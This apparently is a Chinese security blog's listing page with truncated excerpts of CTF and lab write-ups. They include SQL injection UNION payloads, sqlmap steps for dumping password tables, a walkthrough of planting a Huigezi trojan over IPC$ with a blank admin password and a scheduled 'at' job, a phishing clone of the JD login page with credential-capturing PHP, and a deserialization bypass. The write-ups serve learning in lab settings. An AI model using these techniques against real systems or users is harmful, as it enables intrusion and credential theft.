nctf
nctf-1
签到题查看源码即可看到flag
md5 collision一道简单的md5漏洞题目
md5函数漏洞
源码
12345678910$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { echo "false!!!";}}else{echo "please input a";}
即使用get方式传递一个参数a,使得a的值不等于QNKCDZO但是二者的md5值相同
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果 ...
SSTI
https://www.cnblogs.com/wangtanzhi/p/12238779.html
Bugku
Bugku刷题
成绩单1231' and 1=1 # 1' and 1=2 #
不显示内容,可以判断存在注入点
手工注入1.1' order by 4#可正常显示可以判断存在四个字段2.爆数据库` -1' union select 1,database(),3,4 #`
database:skctf_flag3.爆出表名-1' union select 1,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),3,4 # table:fl4g,sc
4.字段名-1' union select 1,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where`TABLE_NAME="fl4g"),3,4 # skctf_flag
得到flag
(sele ...
木马
初识木马
实验目的使用灰鸽子软件以及端口爆破软件控制目的主机
准备一台xp,一台2003其中xp地址为10.1.1.3/24 2003为10.1.1.1/24使两个主机能够通信xp作为攻击方,2003为受害者
1.制作木马使用灰鸽子制作木马,将木马生成在在桌面(记住路径之后要使用)
2.扫描主机,并对账号密码进行爆破ip起始地址为10.1.1.1-10.1.1.255密码配置文件其实只要扫描10.1.1.1即可(因为是实验)
获取账号密码username:administratorpassword: “”
3.与目标主机建立IPC$net use \\10.1.1.1\ipc$ "" \user:administrator
4.植入木马到目标主机copy C:\Documents and Settings\shimisi\桌面\qq.exe \\10.1.1.1\ipc$
5.设置目标主机运行木马net time \\10.1.1.1根据目标主机时间设置事物的开始时间at \\10.1.1.1 17:17 c:\qq.exe在上面的时间之后三分钟左右设置一个事物即 ...
jdtest
爬取京东商品图片的小测试
访问的页面图片链接的位置
123456789101112131415161718192021222324252627282930313233# -*- coding = utf - 8 -*-#@Time : 2020/7/16 14:54#@Author : sunzy#@File : jd.pyimport reimport requestsimport timeimport osdir = "jdtp"if not os.path.exists(dir): os.mkdir(dir)baseurl = "https://search.jd.com/Search?keyword=%E8%BF%9B%E5%8F%A3%E9%9B%B6%E9%A3%9F&enc=utf-8&wq=%E8%BF%9B%E5%8F%A3%E9%9B%B6%E9%A3%9F&pvid=ryxp9pui.nhltvu"head = { "User-Agent": &quo ...
sqlmap
sqlmap使用
第一步:
-u "xx” --cookie= "yyy" //带上cookie对URL进行注入探测第二步:
-u "xxx” --cookie= "yy" - current--db //对数据库名进行获取第三步:
-u "xxx" --cookie="yyy" -D dvwa --tables //对数据库dvwa的表名进行枚举第四步:
-u "xx" --cookie= "yyy" -D dvwa -T users --columns //对dvwa库里面的名为users表的列名进行枚举第五步:
-u"xxx"--cookie="yyy" -D dvwa -T users -C name,password - dump
//探测user表name和password字段如果此时得到的密码为密文, SQLmap会自动询问,是否爆破,选择”是”即可开始使用SQLMAP自带的字典进行爆破。
第 ...
爬图
用爬虫爬取小姐姐的图片
用的库
1234re #正则表达式requests #url请求time #时间os #用于创建文件夹,保存图片
##准备工作1.首先访问该链接https://www.vmgirls.com/2.随便点击一个进入查看详情https://www.vmgirls.com/13344.html3.F12审查元素网查看页详情,主要查看图片链接的标签位置,写出正则表达式该正则表达式为findlinks = '<a href="(.*?)" alt=".*?" title=".*?">'
完整程序12345678910111213141516171819202122232425262728293031# -*- coding = utf - 8 -*-#@Time : 2020/7/16 13:36#@Author : sunzy#@File : tupian.pyimport reimport requestsimport timeimport osdir = " ...
diaoyu
DNS欺骗、ARP攻击及钓鱼网站制作
1.实验目的获取登录jd网页的用户名和密码2.实验主机一台kali,两台win2003,其中一台为客户机,一台为服务器,kali作为攻击者3.实验材料京东登录网页及其所有图片(浏览器访问https://passport.jd.com/new/login.aspx?ReturnUrl=https%3A%2F%2Fwww.jd.com%2F 之后保存网页即可)修改index.html中的内容error.php中的内容如下关键代码(用于保存用户名和密码以及迷惑用户)
12345678910111213141516171819<?php$nam = stripslashes($_POST['name']); //name 是由网页的表单信息决定,不同的网页对应不同的内容,这一点很重要$pas = stripslashes($_POST['pass']);//pass也一样$content = "您已捕获京东账号及密码1个:" . " 用户名 " . $nam . &quo ...
guestbook
guestbook
题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息
在id值后加上” ‘ “测试是否存在测试点网页报错说明存在注入点union 注入!查看列
12https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,3,4%20#//id=-1 是让前面的内容不显示
3被回显
1.查看数据库名
1https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,database(),4%20#
数据库的名字g8
2.查看表名
1https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_s ...
反序列化
反序列化
PHP魔术方法_ wakeup()是在反序列化操作中起作用的魔法函数, 当unserialize的时候, 会检查时候存在 __ wakeup()函数, 如果存在的话,会优先调用__wakeup()函数。
而wakeup()函数漏洞就是与对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么就调用wakeup()函数, 如果该数字大于真实属性个数,就会绕过__wakeup()函数。
serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后, 可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。
unserialize()函数:用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
举例说明
<?php
class Student{
public $full_name = 'zhangsan';
public $score = 150;
public $grades = array();
function __wakeup() ...